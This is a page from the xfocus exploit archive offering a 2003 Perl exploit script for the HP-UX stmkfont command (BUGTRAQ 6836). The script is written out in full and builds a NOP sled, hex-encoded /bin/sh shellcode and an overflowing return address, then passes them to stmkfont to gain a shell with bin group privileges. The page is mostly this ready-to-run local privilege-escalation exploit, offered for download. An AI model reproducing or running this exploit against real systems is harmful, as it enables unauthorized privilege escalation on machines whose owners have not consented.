xfocus logo xfocus title
welcome documents programs exploits advisories forums
Chinese Version

x_hpux_stmkfont.pl


Create: 2003-02-24 Update: 2004-06-15
Platform: Unix
Size: 700 Bytes
MD5: 74b92644a656ffb4247ee180976baea7

A perl version exploit script for command stmkfont of hp-ux to get bin gid shell.
It's a old bug ,BUGTRAQ ID: 6836.


#!/usr/bin/perl
#   Name  : x_hpux_stmkfont.pl
#   Exploit stmkfont command of HPUX to get bin gid shell.
# * Usage : perl ./x_houx_stmkfont.pl
#   By watercloud 2003-2-20
#   http://www.xfocus.org
#   http://www.xfocus.net
$nop   ="\x0b\x39\x02\x99"x65;
$shell ="\x0b\x39\x02\x57\x2a\xe4\x97\x10\x28\x3b\x70\xef\x08\x37\x02\x43";
$shell.="\xb6\xfa\x40\x04\xb6\xf9\x40\x04\xb6\xf8\x40\x04\xe4\x60\xe0\x08";
$shell.="\xb6\xf6\x40\xfe\x0b\x39\x02\x99\x2b\x24\x97\x10\x28\x3b\x70\xef";
$shell.="\xeb\x5f\x1f\xfd\x0b\x39\x02\x99\xb7\x5a\x40\x22\x0f\x40\x12\x0e";
$shell.="\x08\x39\x02\x43\xe4\x60\xe0\x08\xb4\x16\x70\x16/bin/shA";
$addr .="\x7f\x7f\x01\x10"x5000;
exec("/usr/bin/stmkfont -d1 x -d2 " . "'${nop}${shell}${addr}'" . " x");
#EOF

>> download <<